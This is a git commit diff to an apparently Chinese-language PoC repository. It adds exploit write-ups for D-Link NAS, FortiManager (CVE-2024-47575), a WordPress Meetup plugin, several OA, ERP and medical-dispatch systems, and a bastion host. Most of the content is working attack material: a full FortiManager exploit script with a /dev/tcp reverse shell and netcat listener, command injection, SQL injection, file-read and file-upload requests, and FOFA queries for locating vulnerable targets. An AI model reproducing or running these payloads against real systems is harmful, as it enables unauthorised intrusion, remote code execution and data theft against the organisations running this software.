20241116更新

2025-02-27 04:39:25 +00:00 · 2024-11-16 14:02:08 +08:00 · 2024-11-16 14:02:08 +08:00 · 28464308eb
commit 28464308eb
parent 0add3e2624
18 changed files with 775 additions and 9 deletions
--- a/D-Link/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md
+++ b/D-Link/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md
@ -0,0 +1,31 @@
+# D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914)
+D-Link NAS设备 account_mg存在命令执行漏洞
+
+## 影响版本
+```java
+DNS-320-版本 1.00
+DNS-320LW-版本 1.01.0914.2012
+DNS-325-版本 1.01和 1.02
+DNS-340L-版本 1.08
+```
+
+## fofa
+```java
+app="D_Link-DNS-ShareCenter"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png)
+
+## poc
+```java
+GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336023387-187f8fb1-9ff9-44a2-8e5d-f7ac5d81b3cc.png)
+
--- a/FortiManager/FortiManager身份认证绕过漏洞(CVE-2024-47575).md
+++ b/FortiManager/FortiManager身份认证绕过漏洞(CVE-2024-47575).md
@ -0,0 +1,257 @@
+# FortiManager身份认证绕过漏洞(CVE-2024-47575)
+
+**Fortinet FortiManager 身份认证绕过漏洞(CVE-2024-47575)**，未经身份验证的远程攻击者可以使用有效的 FortiGate 证书在 FortiManager 中注册未经授权的设备。成功利用漏洞后攻击者将能够查看和修改文件（例如配置文件）以获取敏感信息，并能够管理其他设备执行任意代码或命令。
+
+## **影响版本**
+
+7.6.0 <= FortiManager 7.6.* <= 7.6.0
+
+7.4.0 <= FortiManager 7.4.* <= 7.4.4
+
+7.2.0 <= FortiManager 7.2.* <= 7.2.7
+
+7.0.0 <= FortiManager 7.0.* <= 7.0.12
+
+6.4.0 <= FortiManager 6.4.* <= 6.4.14
+
+6.2.0 <= FortiManager 6.2.* <= 6.2.12
+
+7.4.1 <= FortiManager Cloud 7.4.* <= 7.4.4
+
+7.2.1 <= FortiManager Cloud 7.2.* <= 7.2.7
+
+7.0.1 <= FortiManager Cloud 7.0.* <= 7.0.12
+
+FortiManager Cloud 6.4.*
+
+## poc
+
+脚本来源 https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
+
+```python
+import socket
+import struct
+import ssl
+import argparse
+import random
+from time import sleep
+
+
+
+banner = """			 __         ___  ___________                   
+	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
+	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
+	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
+	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
+				  \\/          \\/     \\/                            
+
+        CVE-2024-47575.py
+        (*) FortiManager Unauthenticated Remote Code Execution (CVE-2024-47575) exploit by watchTowr
+        
+          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
+
+        CVEs: [CVE-2024-47575]
+"""
+
+
+print(banner)
+parser = argparse.ArgumentParser(description='FortiManager CVE-2024-47575 exploit')
+parser.add_argument('--target', type=str, help='Target IP', required=True)
+parser.add_argument('--lhost', type=str, help='attacker IP', required=False, default='empty')
+parser.add_argument('--lport', type=str, help='attacker PORT', required=False, default='empty')
+parser.add_argument('--action', type=str, choices=['check', 'exploit'], help='Choose an action: "check" or "exploit"', required=True)
+args = parser.parse_args()
+
+
+
+if(args.action == "exploit"):
+    if(args.lhost == 'empty' or args.lport == 'empty'):
+        print("[ERROR] you got an error, because you chose the 'exploit' mode but didnt provide the '--lhost and --lport'")
+        exit(1)
+
+
+# print("[DEBUG] go and run the following command on your fortimanager -> tail -f /var/log/fdssvrd.log")
+# input("press enter to continue")
+
+
+request_getip = b"""get ip
+serialno=FGVMEVWG8YMT3R63
+mgmtid=00000000-0000-0000-0000-000000000000
+platform=FortiGate-VM64
+fos_ver=700
+minor=2
+patch=2
+build=1255
+branch=1255
+maxvdom=2
+fg_ip=192.168.1.53
+hostname=FGVMEVWG8YMT3R63
+harddisk=yes
+biover=04000002
+harddisk_size=30720
+logdisk_size=30235
+mgmt_mode=normal
+enc_flags=0
+first_fmgid=
+probe_mode=yes
+vdom=root
+intf=port1
+\0""".replace(b"\n",b"\r\n")
+
+
+
+request_auth=b"""get auth
+serialno=FGVMEVWG8YMT3R63
+mgmtid=00000000-0000-0000-0000-000000000000
+platform=FortiGate-60E
+fos_ver=700
+minor=2
+patch=4
+build=1396
+branch=1396
+maxvdom=2
+fg_ip=192.168.1.53
+hostname=FortiGate
+harddisk=yes
+biover=04000002
+harddisk_size=30720
+logdisk_size=30107
+mgmt_mode=normal
+enc_flags=0
+mgmtip=192.168.1.53
+mgmtport=443
+\0""".replace(b"\n",b"\r\n")
+
+
+
+
+request_file_exchange = b"""get file_exchange
+localid=REPLACE_LOCAL_ID
+chan_window_sz=32768
+deflate=gzip
+file_exch_cmd=put_json_cmd
+
+\0""".replace(b"\n", b"\r\n").replace(b"REPLACE_LOCAL_ID", str(random.randint(100,999)).encode())
+
+json_payload = b"""{
+    "method": "exec",
+    "id": 1,
+    "params": [
+        {
+            "url": "um/som/export",
+            "data": {
+               "file":"`sh -i >& /dev/tcp/REPLACE_LHOST/REPLACE_LPORT 0>&1`"
+            }
+        }
+    ]
+}""".replace(b"REPLACE_LHOST", args.lhost.encode()).replace(b"REPLACE_LPORT", args.lport.encode())
+request_channel_open = b"""channel
+remoteid=REPLACE_REMOTE_ID
+
+\0""".replace(b"\n", b"\r\n")
+
+request_channel_open += str(len(json_payload)).encode()
+request_channel_open += b"\n"
+request_channel_open += json_payload
+request_channel_open += b"0\n"
+
+
+request_channel_close = b"""channel
+action=close
+remoteid=REPLACE_REMOTE_ID
+
+\0""".replace(b"\n", b"\r\n")
+
+
+def sendmsg(socket, request, recv=True):
+    message=struct.pack(">II", 0x36e01100, len(request)+8)+request
+    socket.send(message)
+    if(not recv):
+        return
+    hdr=socket.read(8)
+    if len(hdr)!=8:
+        return hdr
+    magic, size=struct.unpack(">II", socket.read(8))
+    return socket.read(size)
+
+
+def create_ssl_sock():
+    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+    context.load_cert_chain(certfile="w00t_cert.bin", keyfile="w00t_key.bin")  # Load the certificate and key
+    context.check_hostname = False
+    context.verify_mode = ssl.CERT_NONE
+
+    s = socket.create_connection(host, 30)
+    ssl_sock = context.wrap_socket(s)
+    return ssl_sock
+
+def print_n_sleep(msg, s=0.4):
+    print(msg)
+    sleep(s)
+
+host = (args.target, 541)
+
+ssl_sock = create_ssl_sock()
+
+
+response= sendmsg(ssl_sock, request_getip)
+# print(response)
+
+
+
+response= sendmsg(ssl_sock, request_auth)
+# print(response)
+
+
+
+response = sendmsg(ssl_sock, request_file_exchange)
+remote_id = response.decode().split('\r\n')[1].split('=')[1].strip()
+
+if(remote_id !=None):
+    print(f"[VULN] Target is Vulnerable")
+else:
+    print(f"[SAFE] Target is Safe")
+    exit(1)
+
+if(args.action == "check"):
+    exit(1)
+
+
+request_channel_open = request_channel_open.replace(b"REPLACE_REMOTE_ID", remote_id.encode())
+response = sendmsg(ssl_sock, request_channel_open, False)
+
+# print(response)
+
+
+
+request_channel_close = request_channel_close.replace(b"REPLACE_REMOTE_ID", remote_id.encode())
+
+response = sendmsg(ssl_sock, request_channel_close, True)
+# print(response)
+
+
+
+```
+
+首先，建立您的 ncat 会话：
+
+```
+nc -lvvnp 80
+```
+
+然后，执行我们的exp：
+
+```
+python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
+```
+
+要单独检查漏洞，请使用以下选项：
+
+```
+python3 CVE-2024-47575.py --target 192.168.1.110 --action check
+```
+
+## 漏洞来源
+
+- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
+- https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
--- a/README.md
+++ b/README.md
@ -5,9 +5,66 @@

 感谢以下贡献者为本项目做出的贡献：

-<a href="https://github.com/wy876/POC/graphs/contributors">
-  <img src="https://contrib.rocks/image?repo=wy876/POC" />
-</a>
+<div><table frame=void>
+	<tr>
+        <td align="center">
+            <img src="https://images.weserv.nl/?url=avatars.githubusercontent.com/u/139549762?v=4&mask=circle&w=60&h=60"
+                   alt="Typora-Logo"
+                 />
+            <br>
+            <a href="https://github.com/wy876"><sub>wy876</sub></a>
+        </td>    
+        <td align="center">
+            <img src="https://images.weserv.nl/?url=avatars.githubusercontent.com/u/90972683?v=4&mask=circle&w=60&h=60"
+                   alt="Typora-Logo"
+                 />
+            <br>
+            <a href="https://github.com/Kazgangap"><sub>Kazgangap</sub></a>
+        </td>    
+        <td align="center">
+            <img src="https://images.weserv.nl/?url=avatars.githubusercontent.com/u/30861754?v=4&mask=circle&w=60&h=60"
+                   alt="Typora-Logo"
+                 />
+            <br>
+            <a href="https://github.com/kukais"><sub>kukais</sub></a>
+        </td> 
+        <td align="center">
+            <img src="https://images.weserv.nl/?url=avatars.githubusercontent.com/u/61577401?v=4&mask=circle&w=60&h=60"
+                   alt="Typora-Logo"
+                 />
+            <br>
+            <a href="https://github.com/yiliufeng168"><sub>yiliufeng168</sub></a>
+        </td> 
+        <td align="center">
+            <img src="https://images.weserv.nl/?url=avatars.githubusercontent.com/u/59686577?v=4&mask=circle&w=60&h=60"
+                   alt="Typora-Logo"
+                 />
+            <br>
+            <a href="https://github.com/WebSafety-2tina"><sub>WebSafety-2tina</sub></a>
+        </td> 
+    </tr>
+    </table>
+</div>
+
+
+## 2024.11.16 新增漏洞
+
+- [通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600)](./通达OA/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md)
+- [D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914)](./D-Link/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md)
+- [珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞](./安克电子技术/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md)
+- [用友YonBIP高级版yonbiplogin存在任意文件读取漏洞](./用友OA/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md)
+- [九思OA接口dl.jsp任意文件读取漏洞](./九思OA/九思OA接口dl.jsp任意文件读取漏洞.md)
+- [东胜物流软件GetDataListCA存在SQL注入漏洞](./东胜物流软件/东胜物流软件GetDataListCA存在SQL注入漏洞.md)
+- [企望制造ERP系统drawGrid.action存在SQL漏洞](./企望制造 ERP/企望制造ERP系统drawGrid.action存在SQL漏洞.md)
+- [全新优客API接口管理系统doc存在SQL注入漏洞](./优客API接口管理系统/全新优客API接口管理系统doc存在SQL注入漏洞.md)
+- [海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞](./海信智能公交企业管理系统/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md)
+- [美团代付微信小程序系统read.php任意文件读取漏洞](./美团代付微信小程序系统/美团代付微信小程序系统read.php任意文件读取漏洞.md)
+- [微信公众号商家收银台小程序系统存在前台SQL注入漏洞](./微信公众号商家收银台小程序系统/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md)
+- [赛普EAP企业适配管理平台Upload存在任意文件上传漏洞](./赛普/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md)
+- [中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞](./中成科信票务管理系统/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md)
+- [帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞](./帕拉迪堡垒机/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md)
+- [FortiManager身份认证绕过漏洞(CVE-2024-47575)](./FortiManager/FortiManager身份认证绕过漏洞(CVE-2024-47575).md)
+- [WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483)](./WordPress/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md)

 ## 2024.11.08 新增漏洞

--- a/WordPress/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md
+++ b/WordPress/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md
@ -0,0 +1,37 @@
+## WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483)
+
+WordPress的Meetup插件在0.1及以下的所有版本中都容易绕过身份验证。这是由于插件在通过facebook_register（）函数对用户进行身份验证之前没有正确验证用户的身份。这使得未经身份验证的攻击者可以作为任何用户登录，只要他们知道自己的电子邮件地址。
+注意：您需要知道您要登录的用户电子邮件地址。
+
+poc
+---
+
+```javascript
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: kubernetes.docker.internal
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 149
+
+action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/
+```
+
+Response
+--
+
+```
+HTTP/1.1 200 OK
+Date: Tue, 05 Nov 2024 21:37:23 GMT
+Server: Apache/2.4.57 (Debian)
+X-Powered-By: PHP/8.2.13
+X-Robots-Tag: noindex
+X-Content-Type-Options: nosniff
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+Referrer-Policy: strict-origin-when-cross-origin
+X-Frame-Options: SAMEORIGIN
+Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly
+Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly
+Set-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly
+Content-Length: 0
+Content-Type: text/html; charset=UTF-8
+```
--- a/东胜物流软件/东胜物流软件GetDataListCA存在SQL注入漏洞.md
+++ b/东胜物流软件/东胜物流软件GetDataListCA存在SQL注入漏洞.md
@ -0,0 +1,23 @@
+## 东胜物流软件GetDataListCA存在SQL注入漏洞
+
+东胜物流软件GetDataListCA存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
+```
+
+## poc
+
+```javascript
+GET /MvcShipping/MsCwGenlegAccitems/GetDataListCA?PACCGID=1%27%29+AND+6782+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286782%3D6782%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--+OevW HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+```
+
+![image-20241114140448209](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141404276.png)
--- a/中成科信票务管理系统/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md
+++ b/中成科信票务管理系统/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md
@ -0,0 +1,32 @@
+# 中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞
+
+中成科信票务管理系统 UploadHandler.ashx 任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+icon_hash="1632964065" || icon_hash="-2142050529"
+```
+
+## poc
+
+```javascript
+POST /WeChat/ashx/UploadHandler.ashx HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ 
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Content-Disposition: form-data; name="file"; filename="1.asp"
+Content-Type: image/jpeg
+ 
+<% Response.Write("Hello, World!") %>
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT--
+```
+
+![image-20241115101054420](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411151010495.png)
+
+文件路径：`/UploadImage/1.asp`
--- a/九思OA/九思OA接口dl.jsp任意文件读取漏洞.md
+++ b/九思OA/九思OA接口dl.jsp任意文件读取漏洞.md
@ -0,0 +1,22 @@
+# 九思OA接口dl.jsp任意文件读取漏洞
+
+北京九思协同办公软件dl.jsp接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/jsoa/login.jsp"
+```
+
+## poc
+
+```javascript
+POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+Connection: close
+```
+
+![image-20241114140239709](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141402862.png)
--- a/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统远程命令执行漏洞.md
+++ b/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统远程命令执行漏洞.md
@ -1,13 +1,20 @@
 ## 亿赛通电子文档安全管理系统远程命令执行漏洞

-网络测绘
-fofa:
+## fofa:
+
+```javascript
 app="亿赛通-电子文档安全管理系统"
-
-hunter:
-web.title="电子文档安全管理系统"
-
 ```
+
+## hunter:
+
+```javascript
+web.title="电子文档安全管理系统"
+```
+
+## poc
+
+```xml
 POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
 Accept-Encoding: gzip, deflate
--- a/ERP/企望制造ERP系统drawGrid.action存在SQL漏洞.md
+++ b/ERP/企望制造ERP系统drawGrid.action存在SQL漏洞.md
@ -0,0 +1,26 @@
+# 企望制造ERP系统drawGrid.action存在SQL漏洞
+
+企望制造ERP系统 drawGrid.action 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="企望制造ERP系统"
+```
+
+## poc
+
+```javascript
+POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+tablename=1';WAITFOR DELAY '0:0:5'--
+```
+
+![image-20241114140739587](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141407656.png)
--- a/优客API接口管理系统/全新优客API接口管理系统doc存在SQL注入漏洞.md
+++ b/优客API接口管理系统/全新优客API接口管理系统doc存在SQL注入漏洞.md
@ -0,0 +1,26 @@
+# 全新优客API接口管理系统doc存在SQL注入漏洞
+
+全新优客API接口管理系统 index/doc 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="public/static/index/css/flaghome.css"
+```
+
+## poc
+
+```javascript
+POST /index/index/doc HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+id=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@VERSION,NULL-- -
+```
+
+![image-20241114142149139](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141421210.png)
--- a/安克电子技术/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md
+++ b/安克电子技术/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md
@ -0,0 +1,39 @@
+# 珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞
+珠海市安克电子技术有限公司成立于1992年，专业从事急救信息化系统集成与软件开发，是国内领先的院前急救信息系统供应商。在北京、合肥、西安设有研发中心，在全国设有分支机构和服务网点20个，具有ISO9000等质量体系、高新技术企业、软件企业、信息系统集成等多项认证资质<font style="color:rgb(102, 102, 102);">，</font>珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞。
+
+## fofa
+```javascript
+fid="v6Cd4x0Px/YZrVqV3jQ3xQ=="
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/21711125/1730787843764-4e1b3e61-0356-40a1-8d4e-f1bd5d92cf5a.png)
+
+## poc
+```java
+POST /api/Service.asmx HTTP/1.1
+X-Requested-With: XMLHttpRequest
+Cookie: ASP.NET_SessionId=exrktu3aplxg004tcc2ntnuw; FailCount=5; ASPSESSIONIDSSDTSCDA=OLGBFHMCDJBLGKGENPLEECCO
+SOAPAction: http://tempuri.org/GetAmbulance
+Content-Type: text/xml
+Content-Length: 296
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate,br
+User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
+Host: 
+Connection: Keep-alive
+
+<?xml version="1.0"?>
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://tempuri.org/">
+	<soap:Header />
+	<soap:Body>
+		<tns:GetAmbulance>
+			<tns:CNumber>11' AND 6537 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6537=6537) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)))-- ntgj</tns:CNumber>
+		</tns:GetAmbulance>
+	</soap:Body>
+</soap:Envelope>
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731332070574-8670e58d-e01a-42eb-a55c-c5afe4928fdc.png)
+
+
+
--- a/帕拉迪堡垒机/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md
+++ b/帕拉迪堡垒机/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md
@ -0,0 +1,57 @@
+# 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞
+
+帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞
+
+## poc
+
+```javascript
+POST /sslvpnservice.php HTTP/1.1
+Host: xxxx
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Connection: close
+Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
+Content-Type: text/xml
+Content-Length: 580
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
+<SOAP-ENV:Body>
+<getAccountDetail>
+<data>
+{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
+1=if(1=1,1,2) limit 0,1 -- a","index":"1"}</data>
+</getAccountDetail>
+</SOAP-ENV:Body></SOAP-ENV:Envelope>
+```
+
+```javascript
+POST /sslvpnservice.php HTTP/1.1
+Host: xxxx
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
+Content-Type: text/xml
+Content-Length: 580
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
+<SOAP-ENV:Body>
+<getAccountDetail>
+<data>
